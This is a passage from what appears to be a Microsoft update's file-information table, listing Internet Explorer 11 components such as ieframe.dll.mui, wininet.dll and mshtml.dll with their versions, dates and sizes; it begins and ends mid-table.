22:26| 2,326,016 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,019,840 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,071,040 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,082,816 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,170,368 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,153,984 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,291,712 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,283,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,052,096 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,301,952 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,093,056 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,075,648 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,299,392 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,094,592 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,316,800 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,305,536 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,278,912 \nieframe.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:48| 2,286,080 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,060,288 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,315,776 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,278,912 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,324,992 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,098,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 1,890,304 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 1,890,304 \nieinstal.exe| 11.0.9600.18921| 9-Feb-2018| 21:35| 475,648 \ninetcomm.dll| 6.3.9600.20112| 13-Aug-2021| 19:39| 880,640 \nINETRES.dll| 6.3.9600.16384| 21-Aug-2013| 21:14| 84,480 \n \n### \n\n__\n\nInternet Explorer 11 on all supported Arm-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nactxprxy.dll| 6.3.9600.20045| 4-Jun-2021| 20:58| 1,064,960 \nhlink.dll| 6.3.9600.19101| 18-Jul-2018| 20:30| 68,608 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 47,616 \nurlmon.dll| 11.0.9600.20112| 13-Aug-2021| 18:58| 1,035,264 \niexplore.exe| 11.0.9600.19867| 12-Oct-2020| 22:01| 807,816 \nWininetPlugin.dll| 6.3.9600.16384| 21-Aug-2013| 19:52| 33,792 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 10:19| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 45,056 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:10| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:07| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 52,736 \nwininet.dll.mui| 11.0.9600.20112| 13-Aug-2021| 20:44| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:07| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:06| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:06| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:06| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:06| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 31,232 \nhtml.iec| 2019.0.0.20045| 4-Jun-2021| 21:28| 320,000 \ninetcpl.cpl| 11.0.9600.20045| 4-Jun-2021| 21:05| 2,007,040 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 307,200 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 293,888 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 290,304 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 289,280 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 299,008 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 303,104 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 282,112 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:16| 282,112 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:52| 296,960 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 283,648 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 291,840 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 299,520 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 275,968 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:52| 290,816 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 293,376 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 296,960 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 258,048 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 256,512 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 289,280 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 288,256 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 285,184 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 295,424 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 297,472 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 295,424 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 294,400 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 294,400 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 290,816 \nmshtml.dll.mui| 11.0.9600.20112| 13-Aug-2021| 20:47| 290,816 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 286,208 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:48| 281,600 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:48| 286,720 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:48| 292,352 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:48| 242,176 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 243,200 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 243,200 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 73,728 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 78,848 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 15-Aug-2014| 18:39| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 74,752 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 62,464 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 75,264 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:28| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 73,216 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 41,472 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 37,888 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 70,656 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 69,632 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 68,608 \nF12Resources.dll.mui| 11.0.9600.20112| 13-Aug-2021| 20:46| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 59,904 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 69,120 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 29,696 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 30,720 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 30,720 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:03| 63,488 \nDiagnosticsHub.ScriptedSandboxPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 18:04| 215,552 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 46,080 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 51,712 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 54,272 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 10:09| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:04| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 45,056 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:54| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 39,936 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 39,424 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 51,200 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 13-Aug-2021| 20:45| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:59| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:58| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:58| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:58| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 35,328 \nwininet.dll| 11.0.9600.20112| 13-Aug-2021| 18:59| 4,147,712 \njsproxy.dll| 11.0.9600.17416| 30-Oct-2014| 19:43| 39,936 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 114,176 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 124,928 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 122,880 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 130,048 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 138,240 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18698| 14-May-2017| 12:41| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 131,584 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 117,760 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 122,368 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 134,144 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 107,008 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 0:14| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 127,488 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 128,512 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 88,064 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 0:14| 82,944 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 120,320 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 125,952 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 128,000 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20112| 13-Aug-2021| 20:45| 124,416 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 121,856 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:21| 115,712 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:21| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:22| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:21| 74,752 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 75,776 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 75,776 \nieui.dll| 11.0.9600.19650| 11-Feb-2020| 4:46| 427,520 \niedkcs32.dll| 18.0.9600.19963| 12-Feb-2021| 17:52| 292,864 \ninstall.ins| Not versioned| 13-Aug-2021| 17:53| 464 \nieapfltr.dat| 10.0.9301.0| 23-Sep-2013| 19:22| 616,104 \nieapfltr.dll| 11.0.9600.20112| 13-Aug-2021| 19:02| 548,864 \niepeers.dll| 11.0.9600.19963| 12-Feb-2021| 17:59| 107,008 \nlicmgr10.dll| 11.0.9600.17416| 30-Oct-2014| 19:34| 23,552 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:02| 62,464 \nDiagnosticsHub.DataWarehouse.dll| 11.0.9600.17416| 30-Oct-2014| 19:52| 495,616 \niedvtool.dll| 11.0.9600.20045| 4-Jun-2021| 21:19| 726,016 \nDiagnosticsHub_is.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 39,936 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:06| 364,032 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 17:58| 221,696 \nMicrosoft-Windows-IE-F12-Provider.ptxml| Not versioned| 15-Aug-2014| 15:50| 11,892 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:20| 4,096 \nF12.dll.mui| 11.0.9600.17278| 15-Aug-2014| 18:39| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:28| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:17| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 4,096 \nF12.dll.mui| 11.0.9600.20112| 13-Aug-2021| 20:44| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 3,584 \nDiagnosticsTap.dll| 11.0.9600.20045| 4-Jun-2021| 21:17| 175,616 \nF12Resources.dll| 11.0.9600.17496| 21-Nov-2014| 17:44| 10,948,608 \nF12Tools.dll| 11.0.9600.20045| 4-Jun-2021| 21:16| 263,680 \nF12.dll| 11.0.9600.20045| 4-Jun-2021| 21:08| 1,186,304 \nmsfeeds.dll| 11.0.9600.20112| 13-Aug-2021| 19:14| 587,776 \nmsfeeds.mof| Not versioned| 5-Feb-2014| 21:51| 1,518 \nmsfeedsbs.mof| Not versioned| 21-Aug-2013| 16:43| 1,574 \nmsfeedsbs.dll| 11.0.9600.19650| 11-Feb-2020| 4:34| 43,520 \nmsfeedssync.exe| 11.0.9600.16384| 21-Aug-2013| 20:05| 11,776 \nmshtmled.dll| 11.0.9600.19963| 12-Feb-2021| 18:00| 73,216 \nmshtml.dll| 11.0.9600.20112| 13-Aug-2021| 19:15| 16,228,864 \nmshtml.tlb| 11.0.9600.16518| 6-Feb-2014| 1:36| 2,724,864 \nMicrosoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 5-Feb-2014| 21:39| 3,228 \nIEAdvpack.dll| 11.0.9600.16384| 21-Aug-2013| 19:54| 98,816 \nieetwcollector.exe| 11.0.9600.18658| 5-Apr-2017| 10:29| 98,816 \nieetwproxystub.dll| 11.0.9600.16518| 6-Feb-2014| 1:23| 43,008 \nieetwcollectorres.dll| 11.0.9600.16518| 6-Feb-2014| 1:36| 4,096 \nielowutil.exe| 11.0.9600.17031| 22-Feb-2014| 1:32| 222,208 \nieproxy.dll| 11.0.9600.19963| 12-Feb-2021| 17:33| 308,224 \nIEShims.dll| 11.0.9600.19650| 11-Feb-2020| 4:11| 268,800 \nimgutil.dll| 11.0.9600.19963| 12-Feb-2021| 17:43| 34,816 \nWindows Pop-up Blocked.wav| Not versioned| 23-Sep-2013| 20:25| 85,548 \nWindows Information Bar.wav| Not versioned| 23-Sep-2013| 20:25| 23,308 \nWindows Feed Discovered.wav| Not versioned| 23-Sep-2013| 20:25| 19,884 \nWindows Navigation Start.wav| Not versioned| 23-Sep-2013| 20:25| 11,340 \nbing.ico| Not versioned| 23-Sep-2013| 19:51| 5,430 \nieUnatt.exe| 11.0.9600.16518| 6-Feb-2014| 1:12| 112,128 \nMicrosoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms| Not versioned| 13-Aug-2021| 20:15| 2,956 \njsdbgui.dll| 11.0.9600.19963| 12-Feb-2021| 18:01| 457,216 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:01| 574,976 \nMemoryAnalyzer.dll| 11.0.9600.19963| 12-Feb-2021| 18:12| 1,935,360 \nMshtmlDac.dll| 11.0.9600.19867| 12-Oct-2020| 21:22| 60,928 \nnetworkinspection.dll| 11.0.9600.19963| 12-Feb-2021| 17:57| 1,105,408 \noccache.dll| 11.0.9600.19867| 12-Oct-2020| 21:01| 121,856 \ndesktop.ini| Not versioned| 18-Jun-2013| 7:46| 65 \nwebcheck.dll| 11.0.9600.19867| 12-Oct-2020| 20:57| 201,216 \ndesktop.ini| Not versioned| 18-Jun-2013| 7:46| 65 \npdm.dll| 12.0.20712.1| 26-Jul-2013| 10:03| 420,752 \nmsdbg2.dll| 12.0.20712.1| 26-Jul-2013| 10:03| 295,320 \npdmproxy100.dll| 12.0.20712.1| 26-Jul-2013| 10:03| 76,712 \nmsrating.dll| 11.0.9600.17905| 15-Jun-2015| 12:46| 157,184 \nicrav03.rat| Not versioned| 23-Sep-2013| 19:32| 8,798 \nticrf.rat| Not versioned| 23-Sep-2013| 19:32| 1,988 \niertutil.dll| 11.0.9600.20064| 14-Jun-2021| 20:45| 2,186,240 \nie4uinit.exe| 11.0.9600.19963| 12-Feb-2021| 17:52| 678,400 \niernonce.dll| 11.0.9600.16518| 6-Feb-2014| 1:15| 28,160 \niesetup.dll| 11.0.9600.16518| 6-Feb-2014| 1:23| 59,904 \nieuinit.inf| Not versioned| 12-Mar-2015| 18:46| 16,303 \ninseng.dll| 11.0.9600.16384| 21-Aug-2013| 19:35| 77,312 \niesysprep.dll| 11.0.9600.17416| 30-Oct-2014| 19:28| 87,552 \nTimeline.dll| 11.0.9600.19963| 12-Feb-2021| 18:02| 155,648 \nTimeline_is.dll| 11.0.9600.19963| 12-Feb-2021| 18:14| 130,048 \nTimeline.cpu.xml| Not versioned| 24-Jul-2014| 12:09| 3,197 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:00| 734,720 \nurl.dll| 11.0.9600.17416| 30-Oct-2014| 19:49| 236,032 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 2,066,432 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 2,121,216 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 2,075,136 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 2,063,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 2,314,240 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:54| 2,390,528 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,034,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:03| 2,033,152 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:54| 2,255,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,061,312 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 2,326,016 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:54| 2,019,840 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,071,040 